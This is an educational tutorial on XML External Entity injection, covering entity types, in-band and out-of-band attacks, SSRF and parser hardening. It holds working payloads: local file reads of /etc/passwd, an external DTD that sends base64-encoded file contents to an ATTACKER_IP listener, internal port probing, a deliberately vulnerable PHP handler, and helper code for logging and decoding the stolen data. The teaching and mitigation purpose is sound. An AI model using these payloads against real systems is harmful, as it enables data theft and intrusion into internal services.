XXE Injection

Overview

XML External Entity (XXE) injection happens when an XML parser resolves external entities declared in attacker-controlled input. If the parser is configured to resolve those entities, the attacker may be able to read local files, make the server send requests to internal or external systems (SSRF-style behavior), or exfiltrate data out-of-band when nothing is reflected in the response. These notes cover XML structure, DTDs, entity types, parser behavior, in-band and out-of-band XXE, and common mitigation patterns.

What XML Is

XML is a structured markup format used for data storage, transport, and configuration. It consists of nested elements, attributes, and character data.

<?xml version="1.0" encoding="UTF-8"?>
<user id="1">
   <name>John</name>
   <age>30</age>
   <address>
      <street>123 Main St</street>
      <city>Anytown</city>
   </address>
</user>
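
The element, attribute, and character-data parts of the document above map directly onto what a parser hands back to the application. The following is a minimal sketch using Python's standard-library ElementTree; the function name describe_user and the choice of fields are illustrative assumptions, not part of any particular application.

```python
import xml.etree.ElementTree as ET

# The sample document from above, kept as bytes so the encoding
# declaration in the XML prolog is honored by the parser.
SAMPLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<user id="1">
   <name>John</name>
   <age>30</age>
   <address>
      <street>123 Main St</street>
      <city>Anytown</city>
   </address>
</user>"""


def describe_user(xml_bytes: bytes) -> dict:
    """Return selected attribute and character data of a <user> document."""
    root = ET.fromstring(xml_bytes)
    return {
        "id": root.get("id"),                   # attribute on the root element
        "name": root.findtext("name"),          # character data of a child element
        "age": int(root.findtext("age")),       # character data converted to int
        "city": root.findtext("address/city"),  # nested element reached by path
    }


print(describe_user(SAMPLE))
```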

In web applications, XML often appears in APIs, SOAP services, uploads, backend integrations, and configuration handling.

DTD and Entities

Document Type Definitions (DTDs) define structure and can also declare entities. XXE exists because XML parsers may resolve external entities during parsing.

<!DOCTYPE config [
  <!ELEMENT config (database)>
  <!ELEMENT database (username, password)>
  <!ELEMENT username (#PCDATA)>
  <!ELEMENT password (#PCDATA)>
]>

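Entities are placeholders that the parser expands when it encounters a reference. An internal entity holds a literal string declared in the DTD, an external entity (declared with SYSTEM) points at a URI whose content the parser fetches, and a parameter entity (declared with %) can only be referenced inside the DTD itself.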
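
To make the placeholder behavior concrete, here is a small sketch of internal entity expansion using Python's standard-library ElementTree, which expands internal entities declared in a document's internal DTD subset. The entity name greeting and the note element are made up for illustration.

```python
import xml.etree.ElementTree as ET

# An internal entity declared in the internal DTD subset and referenced twice.
DOC = b"""<!DOCTYPE note [
  <!ENTITY greeting "Hello">
]>
<note>&greeting;, &greeting;!</note>"""


def expand(xml_bytes: bytes) -> str:
    """Parse the document and return the root element's expanded text."""
    return ET.fromstring(xml_bytes).text


print(expand(DOC))
```

Each reference is replaced by the declared string before the application ever sees the text, which is why entity handling is a parser-level concern rather than something application code can filter afterwards.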

Why XXE Happens

XXE is usually a parser configuration issue. If the parser loads DTDs and resolves external entities, attacker-supplied XML can make the server read local files or fetch remote resources.

The dangerous combination is typically attacker-controlled XML reaching a parser that has both DTD processing and external entity resolution enabled.

Common XML Parsers

The parser choice matters, but the key security question is always whether external entities and external DTDs are resolved.

In-Band vs Out-of-Band XXE

In-band XXE returns the resolved entity content in the application's own response. Out-of-band XXE applies when nothing is reflected: the attacker instead observes requests that the target server makes to infrastructure they control.

In-Band XXE Example

Suppose the application parses incoming XML and then reflects the value of the name node back to the user:

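// Deliberately vulnerable. libxml_disable_entity_loader() is deprecated as of PHP 8.0.
libxml_disable_entity_loader(false);

$xmlData = file_get_contents('php://input');
$doc = new DOMDocument();
// LIBXML_NOENT substitutes entities; LIBXML_DTDLOAD loads the external DTD subset.
$doc->loadXML($xmlData, LIBXML_NOENT | LIBXML_DTDLOAD);

// The expanded entity value ends up in the text content of <name> and is reflected.
$expandedContent = $doc->getElementsByTagName('name')->item(0)->textContent;
echo "Thank you, " . $expandedContent . "! Your message has been received.";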

An XXE payload can point &xxe; at a local file such as /etc/passwd:

<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<contact>
  <name>&xxe;</name>
  <email>test@test.com</email>
  <message>test</message>
</contact>

If the parser expands the entity and the application reflects the value, the file contents are disclosed in-band.

Entity Expansion Abuse

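Entity expansion is not only useful for file disclosure. It can also be abused for denial of service: when entities reference other entities several times each, the expanded text grows exponentially with the nesting depth, a pattern often referred to as “Billion Laughs”. The snippet below shows only the harmless building block, a single internal entity referenced twice; the attack nests such definitions several levels deep.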

<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe "This is a test message" >
]>
<contact>
  <name>&xxe; &xxe;</name>
  <email>test@test.com</email>
  <message>test</message>
</contact>
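
The growth from nested entity definitions is easy to underestimate, so a quick calculation helps. This sketch assumes the classic layout in which each level references the previous entity a fixed number of times; the function name and parameters are illustrative.

```python
def expanded_size(base_len: int, fanout: int, levels: int) -> int:
    """Characters produced when each of `levels` nested entities
    references the previous entity `fanout` times, starting from a
    base string of `base_len` characters."""
    return base_len * fanout ** levels


# Classic "Billion Laughs" shape: a 3-character base string,
# 9 nested levels, 10 references per level.
print(expanded_size(3, 10, 9))  # 3000000000
```

A payload well under a kilobyte therefore asks the parser to materialize roughly three billion characters, which is why parsers that allow DTDs usually need an expansion limit as well.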

Out-of-Band XXE

If the vulnerable endpoint does not return the parsed XML value, you may still be able to prove XXE by forcing the target server to connect to infrastructure you control.

A simple proof-of-interaction payload might reference your listener:

<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://ATTACKER_IP:1337/" >
]>
<upload><file>&xxe;</file></upload>

If your web server receives a request from the target, you have confirmed external entity resolution even if the application response itself stays generic.
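
Any HTTP server that logs requests works as the listener. As a rough sketch, the following uses only Python's standard library; CallbackLogger and start_listener are hypothetical names, and the self-request at the end exists only to show the logging locally. In an authorized test you would bind to an externally reachable address and the port used in the payload (1337 above) instead.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class CallbackLogger(BaseHTTPRequestHandler):
    """Records every GET request so callbacks from a target can be reviewed."""

    hits = []  # list of (client_ip, request_path) tuples

    def do_GET(self):
        CallbackLogger.hits.append((self.client_address[0], self.path))
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # suppress the default per-request stderr output


def start_listener(host: str = "127.0.0.1", port: int = 0) -> HTTPServer:
    """Start the listener in a background thread; port 0 picks a free port."""
    server = HTTPServer((host, port), CallbackLogger)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


# Local demonstration: send one request to ourselves and show the log entry.
server = start_listener()
conn = http.client.HTTPConnection("127.0.0.1", server.server_address[1], timeout=5)
conn.request("GET", "/probe")
conn.getresponse().read()
conn.close()
server.shutdown()
server.server_close()
print(CallbackLogger.hits)
```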

External DTD for Exfiltration

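For richer out-of-band exfiltration, attackers often host an external DTD that builds a second entity dynamically and sends file contents back to an attacker-controlled endpoint. The example DTD below (hosted as sample.dtd) uses PHP's php://filter wrapper to base64-encode /etc/passwd so the contents survive being embedded in a URL, which means it only works against PHP targets.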

<!ENTITY % cmd SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oobxxe "<!ENTITY exfil SYSTEM 'http://ATTACKER_IP:1337/?data=%cmd;'>">
%oobxxe;

The target then loads that external DTD:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE upload SYSTEM "http://ATTACKER_IP:1337/sample.dtd">
<upload>
    <file>&exfil;</file>
</upload>

If successful, you will typically see one request for the DTD and another request containing the exfiltrated, often base64-encoded, data.
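
The second request carries the file in its query string, so the listener side needs a decoding step. A minimal sketch, assuming the parameter is named data as in the DTD above; decode_exfil is a hypothetical helper, and the sample request path is constructed locally rather than captured from a real target.

```python
import base64
from urllib.parse import parse_qs, urlsplit


def decode_exfil(request_path: str, param: str = "data") -> str:
    """Extract and base64-decode the exfiltrated value from a request path."""
    query = urlsplit(request_path).query
    value = parse_qs(query).get(param, [""])[0]
    # parse_qs decodes '+' as a space, but '+' is a valid base64 character.
    b64 = value.replace(" ", "+")
    # Restore padding in case it was stripped along the way.
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64).decode("utf-8", errors="replace")


# Locally constructed example of what a logged request path might look like.
sample = "/?data=" + base64.b64encode(b"root:x:0:0:root:/root:/bin/bash\n").decode()
print(decode_exfil(sample))
```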

XXE to SSRF

XXE can also become SSRF. If the parser is willing to fetch external URLs, the attacker can direct the server to query internal services that are not accessible externally.

Example internal probing payload:

<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://localhost:8080/" >
]>
<contact>
  <name>&xxe;</name>
  <email>test@test.com</email>
  <message>test</message>
</contact>

With automation, this can be extended into internal port scanning by varying the port number and watching for response length, timing, or content differences.
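
The automation amounts to templating the port into the payload and comparing the responses. The sketch below shows only those two pieces, assuming an authorized test; build_payload and flag_interesting are hypothetical helpers, and the response lengths are made-up values standing in for real observations.

```python
from collections import Counter

# Same payload as above, with the port left as a placeholder.
PAYLOAD_TEMPLATE = """<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://localhost:{port}/" >
]>
<contact>
  <name>&xxe;</name>
  <email>test@test.com</email>
  <message>test</message>
</contact>"""


def build_payload(port: int) -> str:
    """Return the probing payload for one internal port."""
    return PAYLOAD_TEMPLATE.format(port=port)


def flag_interesting(lengths: dict[int, int]) -> list[int]:
    """Return ports whose response length differs from the most common one."""
    baseline = Counter(lengths.values()).most_common(1)[0][0]
    return sorted(port for port, size in lengths.items() if size != baseline)


# Hypothetical response lengths keyed by probed port.
observed = {22: 310, 80: 310, 3306: 310, 8080: 1542}
print(flag_interesting(observed))
```

Response length is only one signal; timing or error text can be compared the same way when lengths are identical.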

Testing Approach

Mitigation

Disable DTD processing entirely where the application does not need it. Otherwise disable external general entities, external parameter entities, and external DTD loading, and leave the parser without a resolver that can fetch URLs.

Examples

Java

import javax.xml.parsers.DocumentBuilderFactory;

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Rejecting DOCTYPE declarations outright blocks XXE; setFeature can throw ParserConfigurationException.
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Defense in depth in case DOCTYPE declarations have to be allowed later.
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

.NET

XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;

PHP

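// Needed only before PHP 8.0 (deprecated there; libxml 2.9.0+ disables external entity loading by default). Also avoid LIBXML_NOENT.
libxml_disable_entity_loader(true);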

Python

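# defusedxml is a third-party package; by default it raises on entity declarations.
from defusedxml.ElementTree import parse
# xml_input is a filename or an open file object.
et = parse(xml_input)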
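
Where adding defusedxml is not an option, a similar "no DOCTYPE at all" policy can be approximated with the standard library's expat bindings. This is a sketch of that idea, not a replacement for a hardened parser; DoctypeForbidden and assert_no_doctype are hypothetical names.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def assert_no_doctype(xml_bytes: bytes) -> None:
    """Parse the document once and fail as soon as a DOCTYPE is seen."""
    parser = xml.parsers.expat.ParserCreate()

    def reject(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    # expat calls this handler when it reaches the DOCTYPE declaration,
    # before any entity declared inside it can be referenced.
    parser.StartDoctypeDeclHandler = reject
    parser.Parse(xml_bytes, True)


safe = b"<contact><name>John</name></contact>"
hostile = (
    b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b"<contact><name>&xxe;</name></contact>"
)

assert_no_doctype(safe)  # passes silently
try:
    assert_no_doctype(hostile)
except DoctypeForbidden as exc:
    print("rejected:", exc)
```

Running this check before handing the bytes to the real parser costs a second parse, but it keeps the policy independent of whichever XML library the application uses afterwards.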

Key Takeaways